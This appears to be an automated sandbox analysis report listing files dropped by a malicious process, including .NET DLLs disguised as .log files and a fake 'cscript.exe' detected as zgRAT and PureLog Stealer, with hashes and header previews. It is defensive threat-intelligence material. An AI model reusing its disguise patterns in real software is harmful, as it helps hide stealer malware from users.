C:\Users\user\Desktop\NuVdFscS.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PGfLLOAK.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.660491370279985
Encrypted:	false
SSDEEP:	768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
MD5:	240E98D38E0B679F055470167D247022
SHA1:	49888CCED719AE78EE3BAE2959402749668AA1C6
SHA-256:	C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
SHA-512:	93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-\|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PyvtgeZE.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RhnciprG.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\XSgjglWp.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZlZjQqUm.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\dTtanABj.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gEYquOMc.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iGLZQxQX.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	50176
Entropy (8bit):	5.723168999026349
Encrypted:	false
SSDEEP:	768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:	2E116FC64103D0F0CF47890FD571561E
SHA1:	3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:	25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:	39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kuPhBLMV.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40448
Entropy (8bit):	5.7028690200758465
Encrypted:	false
SSDEEP:	768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
MD5:	51B1964F31C557AE8C2B01EA164ABD9F
SHA1:	97C6E8FD1F21D644281FAF82D017969FE22423E4
SHA-256:	AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
SHA-512:	5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\moRxsLqL.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nCAYcgzI.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
SHA1:	8B96C4B6F450E711085AE7B22517C195222ACFDF
SHA-256:	3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
SHA-512:	B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\Desktop\pYJguVIM.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\rtqOkdzB.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	5.629584586954759
Encrypted:	false
SSDEEP:	768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:	D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:	24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:	32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:	0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\shuXVqvz.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34816
Entropy (8bit):	5.636032516496583
Encrypted:	false
SSDEEP:	384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:	996BD447A16F0A20F238A611484AFE86
SHA1:	CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:	0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:	80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vosgrJpv.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\cscript.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\cscript.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\cscript.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Windows\Logs\SIH\SIH.20240801.045723.642.1.etl

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.1725936297454367
Encrypted:	false
SSDEEP:	96:FuQvIt3rz1XwaO+pwLsrqHxtY/2B9IcMkZ+tYcbI9SClcPEgJLs/wL28x:F7Yz1XDOYm1HjEkaTnt7bstIEgG/S28x
MD5:	5FD0ED53296876D4CEDC50D9791307A4
SHA1:	EA0980F05ABC2D710C443F289301404748333A07
SHA-256:	A91D5A2526FF83C9F94C784A1D70495812E3E89417F1B9D51B0DA178CED226DA
SHA-512:	E4FBED5E6AA3BCE9BF514B36CD7911D8C1A8A95456F0D22D5995F4833458334B0E0DA1CCA08AD5E4C1726F2215F01CAC5B2148B7CDA0C80DB56A2B9A48F75BB0
Malicious:	false
Reputation:	unknown
Preview:	....P...P.......................................P...!...................................O.Oo....................eJ..............Zb....... ......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O.............4@.............S.I.H._.t.r.a.c.e._.l.o.g...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.S.I.H.\.S.I.H...2.0.2.4.0.8.0.1...0.4.5.7.2.3...6.4.2...1...e.t.l.......P.P.........O.Oo....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMP2406.tmp

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	17126
Entropy (8bit):	7.3117215578334935
Encrypted:	false
SSDEEP:	192:D5X8WyNHDHFzqDHt8AxL5TKG+tJSdqnajapCNjFZYECUqY7oX9qhnJSdqnaja2Sl:qDlsHq4ThPdlmY9CUiqOdlm2W
MD5:	1B6460EE0273E97C251F7A67F49ACDB4
SHA1:	4A3FDFBB1865C3DAED996BDB5C634AA5164ABBB8
SHA-256:	3158032BAC1A6D278CCC2B7D91E2FBC9F01BEABF9C75D500A7F161E69F2C5F4A
SHA-512:	3D256D8AC917C6733BAB7CC4537A17D37810EFD690BCA0FA361CF44583476121C9BCCCD9C53994AE05E9F9DFF94FFAD1BB30C0F7AFF6DF68F73411703E3DF88A
Malicious:	false
Reputation:	unknown
Preview:	MSCF............D................\|...............A..........d.......................environment.xml.....b...CK..ao.0...J...&.q...-..;+.6+-i.......7.....=....g.P.RQ.#..#...QQ..p.kk..qX..)...T.....zL#<.4......\k..f..,.Q...`..K7.hP..".E.53.V.DW.X).z.=`.COO 8..8.......!$.P!`00....E.m..l .)".J.vC..J..&...5.5(.a..!..MIM.........z.;......t.<.o..\|CR.3>..n.;8dX....:....N.....U.......J.I(vT..3...N....$.._^.A<....&=._(N....m.u.1}.....Ax.b8....q~.i..0.A....H........A.0.@....1.0...`.H.e......0....+.....7......0..0V..+.....7....H.......$f.....`..41200..+.....7...1". ...,..gK.........(...._`Oa..;%.010...`.H.e....... K...,.%@.b./.a...Q.:..E.7....V~....0...0..........3....!.G~&.9......0....H........0~1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1(0&..U....Microsoft Update Signing CA 2.20...190502214449Z..200502214449Z0o1.0...U....US1.0...U....Washington1.0...U....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft Update0.."0...

C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\sls.cab

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	24490
Entropy (8bit):	7.629144636744632
Encrypted:	false
SSDEEP:	384:iarwQcY8StpA7IQ6GCq30XPSIleI7lzCuqvfiSIleIx:iartHA7PCFP66Tqvfi6c
MD5:	ACD24F781C0C8F48A0BD86A0E9F2A154
SHA1:	93B2F4FBF96D15BE0766181AFACDB9FD9DD1B323
SHA-256:	5C0A296B3574D170D69C90B092611646FE8991B8D103D412499DBE7BFDCCCC49
SHA-512:	7B1D821CF1210947344FCF0F9C4927B42271669015DEA1C179B2BEAD9025941138C139C22C068CBD7219B853C80FA01A04E26790D8D76A38FB8BEBE20E0A2A4A
Malicious:	false
Reputation:	unknown
Preview:	MSCF............D...............#................A..........d........B..............environment.cab.x.\&..BCK.\.T...N.....;LB.JW.. .w!....$...U....."........ (.. E..........w...e.Jf.3gN.{...{V.M4.!.....hn. p(... .a...f..f..j.....Kh5..l.DB\}.=.0.>..X.....z..,'..LC/>....h.>.>.........,~mVI.....'EGD]^..\{....Q....f...4.F.....q..FF.1~...Q,.."g.qq.......}.....g%Zz.;m.9..z../2Jl.p8wGO......-V....FM......y.....Hy.xy......N.r;.@uV........Xa...b].`..F...y.Wd.e.8.[Z.s7].....=B.$...'.\|.-.sC....a_(..$..i.C.T.F}...]...m.R,y.1...'..j3.....ir..B..)sR.G...`-=.w....m..2y.....o...\{..C.4.:ZM..wL-$.I.x:?.!.....:..W.%&.....J.%.....~....E..T.d.Q{..p..J..pY...P../.."rp....`...#w.....'.\|n%Dy,.....i....."..x.....b._..\_.^.XOo..*:.&a.`..qA.?.@..t.R/...X3.nF.&........1Z.r.S...9x........?..aP..A...f..k:..\....L...t....Q...1..A..33A1.t..)...c....;......$.$..>._....A.!g`..t...b.H.L..&.....!......v~.n...uE.x...."5.h.4..B.R.d.4.%--.`.B..."..[....l......x(..5......@.zr....

C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMP3056.tmp

Download File

Process:	C:\Windows\System32\SIHClient.exe
File Type:	Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	19826
Entropy (8bit):	7.454351722487538
Encrypted:	false
SSDEEP:	384:3j+naF6zsHqnltHNsAR9zCfsOCUPTNbZR9zOzD8K:z1F6JLts89zIdrFT9zwoK
MD5:	455385A0D5098033A4C17F7B85593E6A
SHA1:	E94CC93C84E9A3A99CAD3C2BD01BFD8829A3BCD6
SHA-256:	2798430E34DF443265228B6F510FC0CFAC333100194289ED0488D1D62C5367A7
